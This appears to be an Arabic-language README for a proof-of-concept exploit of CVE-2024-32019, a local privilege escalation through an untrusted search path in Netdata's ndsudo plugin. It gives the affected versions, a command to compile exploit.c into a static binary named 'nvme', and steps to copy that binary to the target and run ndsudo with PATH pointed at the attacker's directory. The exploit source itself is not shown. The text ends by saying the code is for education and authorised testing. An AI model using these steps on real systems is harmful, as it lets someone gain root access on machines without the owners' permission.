
إثبات مفهوم لثغرة CVE-2024-32019 يوضح تصعيد الامتيازات المحلية عبر مسار بحث غير موثوق في إضافة ndsudo لـ Netdata. يتضمن تعليمات التجميع وخطوات النشر.
>= v1.45.0، < v1.45.3>= v1.44.0-60، < v1.45.0-169CVE-2024-32019 — ndsudo تصعيد الامتيازات المحلية عبر مسار بحث غير موثوق.
x86_64-linux-gnu-gcc -o nvme exploit.c -static
انقل الملف الثنائي المترجم إلى الجهاز الضعيف.
اجعله قابلاً للتنفيذ:
chmod +x nvme
استغل الملف الثنائي الضعيف عبر التلاعب بـ PATH (استخدم نفس المسار الذي رفعت فيه ملفك الثنائي):
PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
تم توفير كود إثبات المفهوم (PoC) هذا لأغراض التعليم واختبار الاختراق المصرح به فقط.